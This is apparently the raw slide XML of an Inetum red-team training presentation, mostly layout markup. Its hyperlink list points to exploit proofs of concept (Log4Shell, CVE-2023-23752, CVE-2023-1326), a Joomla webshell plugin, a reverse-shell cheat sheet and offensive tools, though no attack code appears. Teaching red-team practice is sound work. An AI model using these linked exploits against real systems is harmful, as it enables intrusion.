              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="175"/>
              </a:spcBef>
            </a:pP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14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1400" spc="10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1400" spc="3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140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988617" y="7403481"/>
            <a:ext cx="355969" cy="355969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2526033" y="7403481"/>
            <a:ext cx="355969" cy="355969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3063450" y="7403481"/>
            <a:ext cx="355969" cy="355969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80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385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50C79-6EE3-82D1-8334-2025AD83A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0BB01A-FC3B-63B8-E5CD-0D241FFF3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0042F-CC0A-0F26-22E7-6A91172B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A56FCF-17A4-FA9C-3AC0-99A522A2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60CDEE-808F-CB6A-6920-210346A3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076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B63E-0A6A-279C-FB85-FF65628C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A84D31-8253-701A-7451-27DE6AD35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492702-BE57-FEC3-7EC2-19DED761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F8A2E4-79C0-2F76-5F03-1F44086A5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443B6A-E848-81E2-5910-A60556D5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19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993900" y="2225668"/>
            <a:ext cx="8420100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Introduction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D3C0EACF-3AD5-4884-9531-06FDA14E14F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9855200" y="9143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F84A533-D15F-4251-B825-30C4967127B7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="713066" y="6400800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815314C-9423-41A5-BEA4-E339EE8896AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="14427200" y="5486400"/>
            <a:ext cx="1825625" cy="1827530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1E59CB-5F39-462D-B61D-4A4C7D89D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3900" y="2969888"/>
            <a:ext cx="8420100" cy="291540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" tIns="14400">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:defRPr sz="1800">
                <a:solidFill>
                  <a:schemeClr val="accent3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478016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CB86B-D4D4-C2C3-4EA5-0DC335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06974B-2240-1BA6-A665-D42479365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5A8988-8753-8D76-D3F4-E613354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B6EE3-B873-C0EA-BC20-00E9CBA7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515489-5406-997E-8C3C-A67194D9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0743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D061C-D74B-CEEF-D43E-ACD2AD51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E52582-738E-8402-9CA8-190301285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04F22F-E08D-6E53-97E5-AE81BC0C3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2B4400-FE28-7500-9F1B-E93B5CFD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E77CD7-3599-8103-1E0B-AECA33B7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E9087F-D143-5D3D-96CD-09AE45CA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044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E7D16-8814-0DBC-B7A7-93CD1621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B534C0-3209-EEA0-2A6A-D82CDFFFB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E73854-16D0-082F-233C-58C661273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DAF1FB6-5F7F-CE1D-E15C-28F13DBD6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D20236-2945-9DAA-85C8-CA95E2339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1D68D4-6D73-61B2-04E2-99700AD7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85BEF-B168-2619-F457-696F46905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A4EB02-6271-289B-C2FC-D2A245D4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03976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5BF13-E057-B45B-91F5-4AA2DE8F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943379-B684-FA61-3617-EAE0C26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AB23DD-0F74-D8A0-9537-D18ACF27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A8C4EB-A14B-9167-1C21-BA566AD1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9585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BECE72-A97A-D069-3280-88F4B52B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406EAD-B231-143E-986D-5D1CB49F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9EC7B1-9A0F-1551-D1C0-3DDD5859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1184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051B9-C775-526D-3B0A-522338F2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59A6F-6DCD-B28D-4128-736FA631B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EED37B-2E34-32A5-C2D3-F53426EC3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729E58-E28B-A247-E7B9-951C1648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8DCBDB-1CD2-0B08-4A7D-B6226381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5BD15B-DA56-9937-26F0-87492314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175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7970A-8981-655E-9EEE-C25A2111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AAF48A-5EB0-DC9F-74A4-72555E585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089E88-CDB4-7F49-A002-2C76719D1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B221DC-0DE6-2995-9D42-BC56A752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305438-D963-BEAF-1B19-19666E9C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FC73DF-2B72-AE42-4209-143D8499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2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EBA21-3A46-4599-9291-93886604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4A14F0-2D8A-ED37-7C3F-885F48D0B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396F56-2A12-1A79-96D2-81B45EAB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7ACCF2-DA5D-DFDF-240B-FD7BA4EE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08E138-87A0-063E-1BB4-26D67DF3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71778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5EE7B8-501B-6189-2ED8-D8126FE9F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633200" y="487363"/>
            <a:ext cx="3505200" cy="77485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2C235B-F955-D16F-E8AD-B383BABAF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600" y="487363"/>
            <a:ext cx="10363200" cy="774858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CD5B58-C9AF-116F-67BC-EAA24B81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8C5-4C39-4482-AAB4-354373CE98DE}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>18/03/2024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A7E870-A5E4-629E-EDB6-6102474C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9DDBFA-016D-5FA4-1F33-CF179AB6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5AAC3-CB1D-4EA3-9E0E-B81AF4A043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20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594196" y="521177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21297" y="544354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521296" y="598970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4502160" y="598970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14400" y="521177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41501" y="544354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841500" y="598970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822364" y="598970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14400" y="1974363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841501" y="2206132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841500" y="2752295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6822364" y="2752294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594196" y="1974363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521297" y="2206132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9521296" y="2752295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4502160" y="2752294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1874" y="930268"/>
            <a:ext cx="12018995" cy="1028874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr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fr-FR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8591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7EC72E04-62A6-456D-9129-8BFC76A3EA7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14400" y="1974363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03" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{75D73ABA-CA4C-4758-A70B-18788A7152E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841501" y="2206132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6C41AE2-59D8-4B49-848B-EA4CBB40268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841500" y="2752295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05" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2220B1D5-71D2-48C3-A929-898FF8C1F57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6822364" y="2752294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E2D825A0-520D-4092-8235-41A32121B04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914400" y="4026124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07" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{22E612C7-1A1F-493A-8A38-C03F18CC687E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841501" y="4257893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649F1CE4-C3CE-4985-AD3E-FC4A4AC0C2B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841500" y="4804056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09" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB3A685A-DB20-4E5A-9F48-2108FDDDF82A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822364" y="4804055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25" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FB61BDCE-020E-4BCF-9B3C-320CC2C9B7A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594196" y="1974363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13C2CDE7-3771-468A-A640-29AA16C285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521297" y="2206132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7" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{831093BB-2135-4302-AD17-917734EC88A6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9521296" y="2752295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28" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF93369E-2C3E-4EE7-8D1D-99C239A339E3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4502160" y="2752294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C287AF80-AE6B-424F-8FDB-B11EF6A13FB2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594196" y="4026124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61424F3E-758A-41A8-BED0-46CF7C78F3D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521297" y="4257893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2" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C48A6046-5F7C-45C3-832A-2C969ACC9C87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9521296" y="4804056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27D74F4C-9A89-4C62-9FBF-A53BF21FC90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14502160" y="4804055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42" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD95E687-7F93-472F-98D4-EC938AA6550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4400" y="607788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025B0146-CB38-42F3-839F-A26A6143E0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841501" y="630965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A284474C-E457-4B47-BD17-F5D8229E4172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841500" y="685581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5" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BD29F203-3EED-448C-9A44-6A9AF6E4D1A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822364" y="685581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46" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{37A450F0-202F-4585-8D10-F0C9C63E8342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8594196" y="607788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7" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F15D7F17-C51A-401A-B45B-C0DD68E1A185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9521297" y="630965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EA613244-6AF1-4BED-B339-59144E1E2378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521296" y="685581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9" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{015CB9AD-585C-4445-80B0-B9C7F59AD01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4502160" y="685581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EC744315-8B20-4BBE-A882-04AFDA114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1874" y="930268"/>
            <a:ext cx="12018995" cy="1028874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr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fr-FR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8196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28FBECDA-E756-436B-A2DF-561D7CBEBD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978031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D29DD076-5F15-437B-BFD1-4316097E0A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41501" y="2209800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2B1B91FE-791C-486B-BB38-16A0BC617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1500" y="2755963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1AD460FF-7D8C-43FC-A584-F7A2A0070B2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822364" y="2755962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1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6196209E-A760-418E-ABA2-4DD925C316F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14400" y="325812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6316DC73-28D4-4F73-B949-6F6F5D61C2F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841501" y="348989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E6BEF16F-6B19-411C-B67C-B5AA0800E01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841500" y="403605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898B7DDA-82C5-4103-8C26-5F9811B20C9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6822364" y="403605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7" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7DA447D7-A877-45B8-B6FB-AE90751E887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914400" y="4534937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CFE91535-724D-49F0-92FE-8CAB5C480A1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841501" y="4766706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3D27B957-835E-4BF0-9537-A1AC3D952B2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841500" y="5312869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84C2754-E4E9-4354-B6CB-7B5B7AA5A828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822364" y="5312868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8C74BB45-5D6F-48E6-9347-96EE0CC93A2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914400" y="5811749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BCD1C6AA-1F9C-4210-9D36-274FD1A6AE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841501" y="6043518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180E97C-CAF1-4493-AD31-C1A8E60EAEF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841500" y="6589681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7FE91E81-87F3-42A4-9446-8670F0C28A15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6822364" y="6589680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EDFC2B06-95E3-4B46-9D78-C5B889187574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594196" y="1978031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5C8CF654-7CDC-4671-BA3F-6E43C2F3D930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521297" y="2209800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A689F23-6793-46A5-BC3A-C3C394EB61B7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521296" y="2755963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ED61CF7D-5129-427A-9E6A-C2D5A0108EF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4502160" y="2755962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83" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7919060-BAE1-42EF-8A05-3D8F26EC8E7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14502160" y="2755962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DA0FFCE8-6B8A-4E0A-9547-C340275471A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594196" y="325812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85" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B46C006F-C71D-4DE1-A056-5B3A93CF50D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521297" y="348989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3771224-2466-4D8A-A811-964F73AA64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9521296" y="403605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9" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76FE5254-0432-4E51-B71F-918A5A083FA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4502160" y="403605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90" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77CAFDB0-A524-4811-9A5F-832074D34A45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594196" y="4534937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2F7D0EC5-CECB-4014-B06D-B2DBCBFBBF3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521297" y="4766706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8751CD9A-A0F4-4CC8-8C88-10310AE524D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9521296" y="5312869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26FADFFE-C225-4705-860D-DF5D47B6C04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14502160" y="5312868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94" name="Text Placeholder 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{ED08C253-1799-4939-89C2-67FE09035959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8594196" y="5811749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BA8F5A1C-3DDB-4EB6-A07B-B7ACBC8A5ACC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521297" y="6043518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C6330ADC-D7C7-4EFD-8348-FF37C7A173BC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9521296" y="6589681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97" name="Text Placeholder 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{81AE0480-C514-4AD9-8691-694E141EE29E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14502160" y="6589680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7268FDA8-F92E-4936-B990-FD4E9F0CC0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4400" y="7087972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37FDC6EC-A640-488F-9644-3FDD22493B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841501" y="7319741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1873EAFB-A062-4833-B06F-62FD2E7C3D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841500" y="7865904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EE221A43-C270-4544-94DF-1ABABF451BB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822364" y="7865903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9D8E4515-6F96-4F02-B988-811445E2351C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8594196" y="7087972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A17A929F-E044-48C5-9DD8-B47C3EF2AE1C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9521297" y="7319741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5D5ECF6A-91FB-4513-9425-F01C4C10BAB1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521296" y="7865904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2F7DB677-C811-448B-9E9D-A05B83375084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4502160" y="7865903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7" name="Titre 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{44057687-C51E-48EF-8ABC-CF8D8466D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1874" y="930268"/>
            <a:ext cx="12018995" cy="1028874"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="0" tIns="0" rIns="0" bIns="0"/>
          <a:lstStyle>
            <a:lvl1pPr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fr-FR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0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1" y="647260"/>
            <a:ext cx="1828798" cy="43144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1625600" y="914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98552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5283200" y="73152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0" y="1828800"/>
            <a:ext cx="914400" cy="914392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700"/>
              </a:spcBef>
              <a:defRPr sz="4000" b="1" spc="-16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00" y="2743192"/>
            <a:ext cx="7315200" cy="36576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0704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1625600" y="914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98552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5283200" y="73152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0" y="1828800"/>
            <a:ext cx="914400" cy="914392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700"/>
              </a:spcBef>
              <a:defRPr sz="4000" b="1" spc="-16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00" y="2743192"/>
            <a:ext cx="7315200" cy="36576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53188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2800" y="647260"/>
            <a:ext cx="1828800" cy="43144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1625600" y="914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98552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5283200" y="73152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0" y="1828800"/>
            <a:ext cx="914400" cy="914392"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="tx2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700"/>
              </a:spcBef>
              <a:defRPr sz="4000" b="1" spc="-16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2" name="Holder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{85B5B0C2-1E62-4343-9450-2B0AC120F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00" y="2743192"/>
            <a:ext cx="7315200" cy="3657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12984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  <a:p>
            <a:pPr lvl="5"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Text level 6</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="6"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>Text level 7</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="7"/>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1534160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 userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15454630" y="8407529"/>
            <a:ext cx="688341" cy="280670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="25200" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="1778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3F0D43-E47C-43B1-A174-33E0450FD197}" type="slidenum">
              <a:rPr kumimoji="0" lang="en-US" sz="2000" b="0" i="0" u="none" strike="noStrike" kern="1200" cap="none" spc="10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‹Nº›</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1300" spc="100" baseline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722045-20FB-45FA-9117-8ADC510CA52D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15513776" y="8732520"/>
            <a:ext cx="57004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F18753-7D26-490B-9E11-C62C33337156}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="15364641" y="8798280"/>
            <a:ext cx="897346" cy="280670"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="0" tIns="25200" rIns="0" bIns="0" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" marR="8890" lvl="0" indent="0" algn="ctr" defTabSz="91440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8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36</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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A3938B-2D27-71C2-6BEE-B7DD426BB4F8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9499600" y="8376923"/>
            <a:ext cx="5486400" cy="56169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914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="10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19/03/2024  |  ©2024 Inetum  v1.0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="10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Classification: confidential </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10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público</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="10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0" algn="r" defTabSz="914400" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="10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Introducción</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10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práctica</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="10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al Red Team</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="195552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717" r:id="rId7"/>
    <p:sldLayoutId id="2147483699" r:id="rId8"/>
    <p:sldLayoutId id="2147483700" r:id="rId9"/>
    <p:sldLayoutId id="2147483719" r:id="rId10"/>
    <p:sldLayoutId id="2147483701" r:id="rId11"/>
    <p:sldLayoutId id="2147483702" r:id="rId12"/>
    <p:sldLayoutId id="2147483703" r:id="rId13"/>
    <p:sldLayoutId id="2147483721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20" r:id="rId26"/>
    <p:sldLayoutId id="2147483722" r:id="rId27"/>
  </p:sldLayoutIdLst>
  <p:hf sldNum="0" hdr="0" dt="0"/>
  <p:txStyles>
    <p:titleStyle>
      <a:lvl1pPr marL="14400" algn="l">
        <a:spcBef>
          <a:spcPts val="100"/>
        </a:spcBef>
        <a:defRPr sz="5400">
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
        </a:defRPr>
      </a:lvl1pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" algn="l">
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="620"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="620"/>
        </a:spcAft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>
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="620"/>
        </a:spcAft>
        <a:defRPr sz="21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>
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="620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288000" indent="-216000" algn="l">
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="740"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1800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>
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="620"/>
        </a:spcAft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88000" indent="-216000" algn="l">
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="740"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1500">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="0" algn="l">
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="620"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="0"/>
        </a:spcAft>
        <a:defRPr sz="1300">
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
          <a:ea typeface="+mn-ea"/>
          <a:cs typeface="+mn-cs"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="288000" indent="-216000" algn="l">
        <a:lnSpc>
          <a:spcPct val="110000"/>
        </a:lnSpc>
        <a:spcBef>
          <a:spcPts val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPts val="740"/>
        </a:spcAft>
        <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
        <a:buChar char="§"/>
        <a:defRPr sz="1300">
          <a:solidFill>
            <a:schemeClr val="accent1"/>
          </a:solidFill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5AF196-C1C2-DD00-32CB-C96036D9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22B6D7-F13C-C719-600E-F53ABE5FB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55E760-9303-5735-BDA9-99E39A06C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CD8C5-4C39-4482-AAB4-354373CE98DE}" type="datetimeFigureOut">
              <a:rPr lang="es-ES" smtClean="0"/>
              <a:t>18/03/2024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0CA3D7-58B0-AF25-5349-995D84B6D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CE5B3-8032-B8FC-79C2-4AF49E531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5AAC3-CB1D-4EA3-9E0E-B81AF4A0431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999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kozmer/log4j-shell-poc" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/o7-Fire/Log4Shel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MCCTeam/Minecraft-Console-Client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akkaya.com/2009/04/15/using-netcat-for-file-transfers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hyperlink" Target="https://github.com/int0x33/nc.ex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0x33/nc.exe/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nakkaya.com/2009/04/15/using-netcat-for-file-transfer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java-decompiler.github.io/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stackoverflow.com/a/34307483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pp.hackthebox.com/machines/577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exploits/51334" TargetMode="External"/><Relationship Id="rId7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hyperlink" Target="https://github.com/K3ysTr0K3R/CVE-2023-23752-EXPLOIT" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nvd.nist.gov/vuln/detail/CVE-2023-2375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p0dalirius/Joomla-webshell-plugin" TargetMode="Externa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p0dalirius/Joomla-webshell-plugi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ronhackers.es/herramientas/reverse-shell-cheat-sheet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hyperlink" Target="https://diegojoelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00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diego-tella/CVE-2023-1326-PoC" TargetMode="Externa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joelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/diego-tella/CVE-2023-1326-PoC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joelcondoriquispe.medium.com/cve-2023-1326-poc-c8f2a59d0e00" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/diego-tella/CVE-2023-1326-PoC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ckerone.com/hackers/hacker101" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://tryhackme.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.hackplayers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hackthebox.com/" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://portswigger.net/" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://pentester.land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sullo/nikto" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/maurosoria/dirsearch" TargetMode="External"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.parrotsec.org/" TargetMode="External"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openwall.com/john/" TargetMode="External"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/" TargetMode="External"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.tenable.com/" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/ffuf/ffuf" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.metasploit.com/" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.kali.org/" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/OJ/gobuster" TargetMode="External"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://hashcat.net/hashcat/" TargetMode="Externa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g"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://github.com/projectdiscovery/nuclei" TargetMode="External"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image30.png"/><Relationship Id="rId5" 